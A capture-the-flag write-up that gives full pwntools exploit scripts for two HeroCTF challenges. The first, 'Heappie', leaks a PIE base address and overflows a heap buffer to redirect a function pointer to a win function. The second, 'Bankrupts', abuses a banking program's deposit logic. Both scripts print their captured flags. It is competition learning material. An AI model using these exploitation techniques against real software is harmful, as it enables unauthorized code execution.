dplastico

Heappie

This is a cool heap challenge for beginners

#!/usr/bin/env python3

from pwn import *

elf = ELF("./heappie_patched")

context.binary = elf
context.terminal = ['tmux', 'splitw', '-hp', '70']
#context.log_level = "debug"
gs = '''
continue
'''

def start():
    if args.REMOTE:
        return remote("pwn.heroctf.fr", 6000)
    if args.GDB:
        return gdb.debug([elf.path], gdbscript=gs)
    else:
        return process([elf.path])

r = start()

def logbase(): log.info("libc base = %#x" % libc.address)
def logleak(name, val):  log.info(name+" = %#x" % val)
def sa(delim,data): return r.sendafter(delim,data)
def sla(delim,line): return r.sendlineafter(delim,line)
def sl(line): return r.sendline(line)
def rcu(d1, d2=0):
  r.recvuntil(d1, drop=True)
  # return data between d1 and d2
  if (d2):
    return r.recvuntil(d2,drop=True)

index = 0

#========= exploit here ===================
r.timeout = 0.5
def add_music(yn,title,artist, description):
    global index
    sl(b"1")
    sla(b"(y/n):", yn) #sound
    sla(b"title:", title)
    sla(b"artist:", artist)
    sla(b"description:", description)
    rcu(b">>")
    index += 1
    return index - 1

def play_music(idx):
    sl(b"2")
    sla(b"index:", str(idx).encode('ascii'))

def delete_music(idx):
    sl(b"3")
    sla(b"index:", str(idx).encode('ascii'))
    rcu(b">>")

a = add_music(b"y",b"XXXXXXXX",b"YYYYYYYY", (b"Z"))

#leak 1/3 bruteforce
sl(b"4")
leak = int(rcu(b"by YYYYYYYY (song: ", b")"),16)
rcu(b">>")
logleak("leak", leak)
#calculating the offset, mask = 0xfff (+0x1000)
value = (leak & 0xfff) + 0x1000
elf.address = leak - value
logleak("base address", elf.address)
#0x55a6913762e9

#reset 
delete_music(a)

#trigger win
a = add_music(b"y",b"XXXXXXXX",b"YYYYYYYY", (b"Z"*128)+p64(elf.sym.win))
b = add_music(b"n",b"AAAAAAAA",b"BBBBBBBB", b"CCCCCCCC")

#get the flag
play_music(1)

#========= interactive ====================
r.interactive()
#Hero{b4s1c_H3AP_0verfL0w!47280319}

Bankrupts

A cool pwn challenge written in Rust:

#!/usr/bin/env python3

from pwn import *

elf = ELF("./bankrupst_patched")

context.binary = elf
context.terminal = ['tmux', 'splitw', '-hp', '70']
#context.log_level = "debug"
gs = '''
continue
'''

def start():
    if args.REMOTE:
        return remote("pwn.heroctf.fr", 6001)
    if args.GDB:
        return gdb.debug([elf.path], gdbscript=gs)
    else:
        return process([elf.path])

r = start()

def logbase(): log.info("libc base = %#x" % libc.address)
def logleak(name, val):  log.info(name+" = %#x" % val)
def sa(delim,data): return r.sendafter(delim,data)
def sla(delim,line): return r.sendlineafter(delim,line)
def sl(line): return r.sendline(line)
def rcu(d1, d2=0):
  r.recvuntil(d1, drop=True)
  # return data between d1 and d2
  if (d2):
    return r.recvuntil(d2,drop=True)

#========= exploit here ===================

sla(b"an option:",b"1")

for i in range(13):
    sl(b"2")
    sla(b"deposit?", b"100")
    sleep(0.2)

sl(b"5")
sla(b"an option: ", b"1")
sleep(0.2)
sl(b"2")
sla(b"deposit?", b"100")
sleep(0.2)
sl(b"4")
#========= interactive ====================
r.interactive()
#Hero{B4nkk_Rupst3dDd!!1x33x7}